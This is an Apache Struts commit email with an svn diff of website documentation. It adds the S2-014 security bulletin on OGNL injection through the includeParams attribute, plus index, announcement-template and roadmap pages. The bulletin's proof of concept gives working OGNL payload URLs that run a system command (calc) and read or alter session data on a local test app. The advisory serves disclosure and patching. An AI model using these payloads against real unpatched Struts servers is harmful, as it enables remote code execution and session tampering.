You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@struts.apache.org by rg...@apache.org on 2013/05/26 23:39:00 UTC
svn commit: r863224 [3/3] - in /websites/production/struts/content:
development/2.x/docs/ release/2.3.x/docs/
Added: websites/production/struts/content/release/2.3.x/docs/s2-014.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/s2-014.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/s2-014.html Sun May 26 21:38:59 2013
@@ -0,0 +1,246 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image: url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>S2-014</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+ <A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A> > <A href="home.html" title="Home">Home</A> > <A href="security-bulletins.html" title="Security Bulletins">Security Bulletins</A> > <A href="" title="S2-014">S2-014</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search" method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">S2-014</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822584">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822584">Edit Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822584">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822584">Add Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822584">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822584">Add News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <H2><A name="S2-014-Summary"></A>Summary</H2>
+
+
+<P>A vulnerability introduced by forcing parameter inclusion in the <EM>URL</EM> and <EM>Anchor</EM> Tag allows remote command execution, session access and manipulation and XSS attacks</P>
+
+
+<DIV class="table-wrap">
+<TABLE class="confluenceTable"><TBODY>
+<TR>
+<TH class="confluenceTh">Who should read this</TH>
+<TD class="confluenceTd">All Struts 2 developers and users</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Impact of vulnerability</TH>
+<TD class="confluenceTd">Remote command execution, remote server context manipulation, injection of malicious client side code</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Maximum security rating</TH>
+<TD class="confluenceTd">Highly Critical</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Recommendation</TH>
+<TD class="confluenceTd">Developers should immediately upgrade to <A href="http://struts.apache.org/download.cgi#struts23142" class="external-link" rel="nofollow">Struts 2.3.14.2</A></TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Affected Software</TH>
+<TD class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14.1 </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Reporter</TH>
+<TD class="confluenceTd"> Eric Kobrin and Douglas Rodrigues (Akamai), Coverity Security Research Laboratory, NSFOCUS Security Team </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">CVE Identifier</TH>
+<TD class="confluenceTd"><A href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115" class="external-link" rel="nofollow">CVE-2013-2115</A>, <A href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966" class="external-link" rel="nofollow">CVE-2013-1966</A></TD>
+</TR>
+</TBODY></TABLE>
+</DIV>
+
+
+<H2><A name="S2-014-Problem"></A>Problem</H2>
+
+<P>Both the <A href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html" class="external-link" rel="nofollow"><EM>s:url</EM></A> and <A href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html" class="external-link" rel="nofollow"><EM>s:a</EM></A> tag provide an <EM>includeParams</EM> attribute. </P>
+
+<P>The main scope of that attribute is to understand whether includes http request parameter or not. </P>
+
+<P>The allowed values of includeParams are:</P>
+<OL>
+ <LI><EM>none</EM> - include no parameters in the URL (default)</LI>
+ <LI><EM>get</EM> - include only GET parameters in the URL</LI>
+ <LI><EM>all</EM> - include both GET and POST parameters in the URL</LI>
+</OL>
+
+
+<P>A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an <EM>URL</EM> or <EM>A</EM> tag , which will cause a further evaluation. </P>
+
+<P>The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.<BR>
+This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</P>
+
+<P>The issue was originally addressed by Struts 2.3.14.1 and Security Announcement <A href="s2-013.html" title="S2-013">S2-013</A>. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that <B>every</B> version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.</P>
+
+<H2><A name="S2-014-Proofofconcept"></A>Proof of concept</H2>
+
+<OL>
+ <LI>Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">
+ includeParams=<SPAN class="code-quote">"all"</SPAN>
+</PRE>
+</DIV></DIV>
+<P>Such that the line will be something look like this:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><s:url id=<SPAN class="code-quote">"url"</SPAN> action=<SPAN class="code-quote">"HelloWorld"</SPAN> includeParams=<SPAN class="code-quote">"all"</SPAN>></SPAN>
+</PRE>
+</DIV></DIV></LI>
+ <LI>Run struts2-blank app</LI>
+ <LI>Open the following url, resulting in calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):
+ <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">http:<SPAN class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=<SPAN class="code-keyword">true</SPAN>,@java.lang.<SPAN class="code-object">Runtime</SPAN>@getRuntime().exec('calc')}</SPAN></PRE>
+</DIV></DIV></LI>
+ <LI>Open the following url to modify session content:
+ <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">http:<SPAN class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='<SPAN class="code-keyword">true</SPAN>'}</SPAN></PRE>
+</DIV></DIV></LI>
+ <LI>Open the following url to print out session content and in combination with the previous example introduce arbitrary code into the resulting HTML output:
+ <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">http:<SPAN class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}</SPAN></PRE>
+</DIV></DIV></LI>
+</OL>
+
+
+<P>As you will notice, in this case, there is no way to escape/sanitize the malicious parameter, since it's not an expected parameter and even will not get evaluated the request parameters are processed. </P>
+
+<H2><A name="S2-014-Solution"></A>Solution</H2>
+
+<P>The URL rendering subsystem was changed to not pass any parameter name or value to OGNL evaluation.</P>
+
+<P>The MemberAccess component's allowStaticMethodAccess property is now immutable.</P>
+
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Backward Compatibility</B><BR>A small amount of very elaborated <EM>URL</EM> or <EM>A</EM> tag usages depending on the now disabled evaluation might produce unexpected results now.<BR>
+Please, ensure that
+<OL>
+ <LI>all expressions that should get evaluated are explicitly introduced via <EM>PARAM</EM> tags within <EM>URL</EM> or <EM>A</EM> tags.</LI>
+ <LI>all expressions used in <EM>PARAM</EM> tags come from a sanitized input.</LI>
+</OL>
+</TD></TR></TABLE></DIV>
+
+<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is strongly recommended to upgrade to <A href="http://struts.apache.org/download.cgi#struts23142" class="external-link" rel="nofollow">Struts 2.3.14.2</A>, which contains the corrected OGNL and XWork library.</B></TD></TR></TABLE></DIV>
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file
Modified: websites/production/struts/content/release/2.3.x/docs/sample-announcements.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/sample-announcements.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/sample-announcements.html Sun May 26 21:38:59 2013
@@ -125,11 +125,11 @@ under the License.
<DIV class="wiki-content">
<H1><A name="Sampleannouncements-Content"></A>Content</H1>
<STYLE type="text/css">/*<![CDATA[*/
-div.rbtoc1325620387176 {margin-left: 0px;padding: 0px;}
-div.rbtoc1325620387176 ul {list-style: none;margin-left: 0px;}
-div.rbtoc1325620387176 li {margin-left: 0px;padding-left: 0px;}
+div.rbtoc1369291474878 {margin-left: 0px;padding: 0px;}
+div.rbtoc1369291474878 ul {list-style: none;margin-left: 0px;}
+div.rbtoc1369291474878 li {margin-left: 0px;padding-left: 0px;}
-/*]]>*/</STYLE><DIV class="rbtoc1325620387176">
+/*]]>*/</STYLE><DIV class="rbtoc1369291474878">
<UL>
<LI><SPAN class="TOCOutline">1</SPAN> <A href="#Sampleannouncements-Content">Content</A></LI>
<UL>
@@ -270,8 +270,24 @@ the security patch.</LI>
<DIV class="preformatted panel" style="border-width: 1px;"><DIV class="preformattedContent panelContent">
<PRE>The Struts #.#.#.# test build is now available.
+(optional (in case of the presence of security bulletin)
+It includes the latest security patches which fix two possible vulnerabilities:
+* ...
+* ...
+
+For details and the rationale behind these changes, please consult the
+corresponding security bulletins:
+* https://cwiki.apache.org/confluence/display/WW/S2-XXX
+* https://cwiki.apache.org/confluence/display/WW/S2-XXX
+
+Please note that currently these bulletins and the release notes are
+only visible to logged-in users with the struts-committer role. This is
+a needed requirement to control disclosure until the actual release is
+announced.
+(/optional)
+
Release notes:
-* [http://struts.apache.org/2.x/docs/version-notes-####.html]
+* [https://cwiki.apache.org/confluence/display/WW/Version+Notes+#.#.#.#]
Distribution:
* [http://people.apache.org/builds/struts/#.#.#.#/]
@@ -290,9 +306,12 @@ Everyone who has tested the build is inv
This is a "fast-track" release vote. If we have a positive vote after 24 hours (at least three binding +1s and more +1s than -1s), the release may be submitted for mirroring and announced to the usual channels.
-The website download link will include the mirroring timestamp parameter [1], which limits the selection of mirrors to those that have been refreshed since the indicated time and date. (After 24 hours, we \*must\* remove the timestamp parameter from the website link, to avoid unnecessary server load.) In the case of a fast-track release, the email announcement will not link directly to <download.cgi>, but to <downloads.html>, so that we can control use of the timestamp parameter.
+The website download link will include the mirroring timestamp parameter [1], which limits the selection of mirrors to those that have been refreshed since the indicated time and date. (After 24 hours, we *must* remove the timestamp parameter from the website link, to avoid unnecessary server load.) In the case of a fast-track release, the email announcement will not link directly to <download.cgi>, but to <downloads.html>, so that we can control use of the timestamp parameter.
[1] <[http://apache.org/dev/mirrors.html#use|http://apache.org/dev/mirrors.html#use]>
+
+- The Apache Struts group.
+
</PRE>
</DIV></DIV>
Modified: websites/production/struts/content/release/2.3.x/docs/security-bulletins.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/security-bulletins.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/security-bulletins.html Sun May 26 21:38:59 2013
@@ -125,7 +125,7 @@ under the License.
<DIV class="wiki-content">
<P>The following security bulletins are available:</P>
-<UL><LI><A href="s2-001.html" title="S2-001">S2-001</A> — <SPAN class="smalltext">Remote code exploit on form validation error</SPAN></LI><LI><A href="s2-002.html" title="S2-002">S2-002</A> — <SPAN class="smalltext">Cross site scripting (XSS) vulnerability on <s:url> and <s:a> tags</SPAN></LI><LI><A href="s2-003.html" title="S2-003">S2-003</A> — <SPAN class="smalltext">XWork ParameterInterceptors bypass allows OGNL statement execution</SPAN></LI><LI><A href="s2-004.html" title="S2-004">S2-004</A> — <SPAN class="smalltext">Directory traversal vulnerability while serving static content</SPAN></LI><LI><A href="s2-005.html" title="S2-005">S2-005</A> — <SPAN class="smalltext">XWork ParameterInterceptors bypass allows remote command execution</SPAN></LI><LI><A href="s2-006.html" title="S2-006">S2-006</A> — <SPAN class="smalltext">Multiple Cross-Site Scripting (XSS) in XWork generated error pages</SPAN></LI><LI><A href="s2-007.html" t
itle="S2-007">S2-007</A> — <SPAN class="smalltext">User input is evaluated as an OGNL expression when there's a conversion error</SPAN></LI><LI><A href="s2-008.html" title="S2-008">S2-008</A> — <SPAN class="smalltext">Multiple critical vulnerabilities in Struts2</SPAN></LI><LI><A href="s2-009.html" title="S2-009">S2-009</A> — <SPAN class="smalltext">ParameterInterceptor vulnerability allows remote command execution</SPAN></LI><LI><A href="s2-010.html" title="S2-010">S2-010</A> — <SPAN class="smalltext">When using Struts 2 token mechanism for CSRF protection, token check may be bypassed by misusing known session attributes</SPAN></LI><LI><A href="s2-011.html" title="S2-011">S2-011</A> — <SPAN class="smalltext">Long request parameter names might significantly promote the effectiveness of DOS attacks</SPAN></LI></UL>
+<UL><LI><A href="s2-001.html" title="S2-001">S2-001</A> — <SPAN class="smalltext">Remote code exploit on form validation error</SPAN></LI><LI><A href="s2-002.html" title="S2-002">S2-002</A> — <SPAN class="smalltext">Cross site scripting (XSS) vulnerability on <s:url> and <s:a> tags</SPAN></LI><LI><A href="s2-003.html" title="S2-003">S2-003</A> — <SPAN class="smalltext">XWork ParameterInterceptors bypass allows OGNL statement execution</SPAN></LI><LI><A href="s2-004.html" title="S2-004">S2-004</A> — <SPAN class="smalltext">Directory traversal vulnerability while serving static content</SPAN></LI><LI><A href="s2-005.html" title="S2-005">S2-005</A> — <SPAN class="smalltext">XWork ParameterInterceptors bypass allows remote command execution</SPAN></LI><LI><A href="s2-006.html" title="S2-006">S2-006</A> — <SPAN class="smalltext">Multiple Cross-Site Scripting (XSS) in XWork generated error pages</SPAN></LI><LI><A href="s2-007.html" t
itle="S2-007">S2-007</A> — <SPAN class="smalltext">User input is evaluated as an OGNL expression when there's a conversion error</SPAN></LI><LI><A href="s2-008.html" title="S2-008">S2-008</A> — <SPAN class="smalltext">Multiple critical vulnerabilities in Struts2</SPAN></LI><LI><A href="s2-009.html" title="S2-009">S2-009</A> — <SPAN class="smalltext">ParameterInterceptor vulnerability allows remote command execution</SPAN></LI><LI><A href="s2-010.html" title="S2-010">S2-010</A> — <SPAN class="smalltext">When using Struts 2 token mechanism for CSRF protection, token check may be bypassed by misusing known session attributes</SPAN></LI><LI><A href="s2-011.html" title="S2-011">S2-011</A> — <SPAN class="smalltext">Long request parameter names might significantly promote the effectiveness of DOS attacks</SPAN></LI><LI><A href="s2-012.html" title="S2-012">S2-012</A> — <SPAN class="smalltext">Showcase app vulnerability allows remote command execut
ion</SPAN></LI><LI><A href="s2-013.html" title="S2-013">S2-013</A> — <SPAN class="smalltext">A vulnerability, present in the <EM>includeParams</EM> attribute of the <EM>URL</EM> and <EM>Anchor</EM> Tag, allows remote command execution</SPAN></LI><LI><A href="s2-014.html" title="S2-014">S2-014</A> — <SPAN class="smalltext">A vulnerability introduced by forcing parameter inclusion in the <EM>URL</EM> and <EM>Anchor</EM> Tag allows remote command execution, session access and manipulation and XSS attacks</SPAN></LI></UL>
</DIV>
<DIV class="tabletitle">
@@ -169,6 +169,15 @@ under the License.
<A href="s2-011.html" title="S2-011">S2-011</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
+ <A href="s2-012.html" title="S2-012">S2-012</A>
+ <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
+ <BR>
+ <A href="s2-013.html" title="S2-013">S2-013</A>
+ <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
+ <BR>
+ <A href="s2-014.html" title="S2-014">S2-014</A>
+ <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
+ <BR>
</DIV>
</DIV>
Added: websites/production/struts/content/release/2.3.x/docs/struts-next.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/struts-next.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/struts-next.html Sun May 26 21:38:59 2013
@@ -0,0 +1,203 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image: url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>Struts Next</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+ <A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A> > <A href="home.html" title="Home">Home</A> > <A href="" title="Struts Next">Struts Next</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search" method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">Struts Next</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27832363">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27832363">Edit Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27832363">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27832363">Add Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27832363">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27832363">Add News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <H3><A name="StrutsNext-Whatshouldbeimproved%2Fchanged"></A>What should be improved / changed</H3>
+
+<P><A href="https://issues.apache.org/jira/browse/WW/fixforversion/12319158" class="external-link" rel="nofollow">Issues</A> connected with the new version <BR>
+<A href="https://builds.apache.org/view/S-Z/view/Struts/job/Struts3/" class="external-link" rel="nofollow">Build</A> of the latest version</P>
+
+<UL>
+ <LI>Use Git instead Svn
+ <UL>
+ <LI>Use Git flow to manage the repo and development process
+ <UL>
+ <LI><A href="http://nvie.com/posts/a-successful-git-branching-model/" class="external-link" rel="nofollow">http://nvie.com/posts/a-successful-git-branching-model/</A></LI>
+ <LI><A href="https://github.com/nvie/gitflow" class="external-link" rel="nofollow">https://github.com/nvie/gitflow</A></LI>
+ <LI><A href="http://jeffkreeftmeijer.com/2010/why-arent-you-using-git-flow/" class="external-link" rel="nofollow">http://jeffkreeftmeijer.com/2010/why-arent-you-using-git-flow/</A></LI>
+ </UL>
+ </LI>
+ </UL>
+ </LI>
+ <LI>Switch to Java 1.6</LI>
+ <LI>Update "internal" injection to use current Guice.</LI>
+ <LI>Refactorings for further extensibility based on questions on the list, on CodeRanch, and Stack Overflow
+ <UL>
+ <LI>JR plugin refactoring. Allow compiled reports as classpath resources.</LI>
+ </UL>
+ </LI>
+ <LI>Refactor conversion of primitives (and wrappers) in XWork</LI>
+ <LI>Switch to <A href="http://commons.apache.org/ognl" class="external-link" rel="nofollow">OGNL 4.0</A>.</LI>
+ <LI>Adopt <A href="http://www.slf4j.org/" class="external-link" rel="nofollow">slf4j</A> as new logging framework: this allows developers to plug-in any logging framework they want.</LI>
+ <LI>Consider renaming packages to org.apache.struts3</LI>
+ <LI>Remove deprecated Plugins
+ <UL>
+ <LI>Codebehind</LI>
+ <LI>Dojo</LI>
+ </UL>
+ </LI>
+ <LI>Normalize property name camel-casing (foo.bar.BazPlugh to foo.bar.bazPlugh)</LI>
+ <LI>Check possible usage of Tiles Auto Tag (<A href="http://tiles.apache.org/tiles-autotag/" class="external-link" rel="nofollow">http://tiles.apache.org/tiles-autotag/</A>) instead of Struts Annotations</LI>
+</UL>
+
+
+<P>Plan for Struts 2.5</P>
+<OL>
+ <LI>Request Git repo from INFRA</LI>
+ <LI>Import project</LI>
+ <LI>Remove deprecated plugins</LI>
+ <LI>Drop support for Struts 1 (remove plugin)</LI>
+ <LI>Remove deprecated APIs</LI>
+ <LI>Switch to Java 1.6</LI>
+ <LI>Rename XWork packages to org.apache.struts.xwork</LI>
+ <LI>Prepare the first release</LI>
+ <LI>Cleanup website</LI>
+</OL>
+
+
+<P>Plan for Struts 3</P>
+<OL>
+ <LI>Rename Struts 2 packages to org.apache.struts</LI>
+ <LI>...</LI>
+</OL>
+
+
+<H3><A name="StrutsNext-Cleanupwebsite"></A>Cleanup website</H3>
+
+<P>There should be just one project website - Apache Struts. Right now there is the main website - Apache Struts project, subsite Apache Struts 1 and another subsite Apache Struts 2. After announcing EOL of Struts 1, we basically supporting just one version or rather brunch - Apache Struts 2 which should be at some point converted just into Apache Struts (version 2.5, version 3.0, version 3.1, etc.).</P>
+
+<P>With that in mind we should have just one website to manage the project.</P>
+
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file
Added: websites/production/struts/content/release/2.3.x/docs/version-notes-23141.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/version-notes-23141.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/version-notes-23141.html Sun May 26 21:38:59 2013
@@ -0,0 +1,207 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
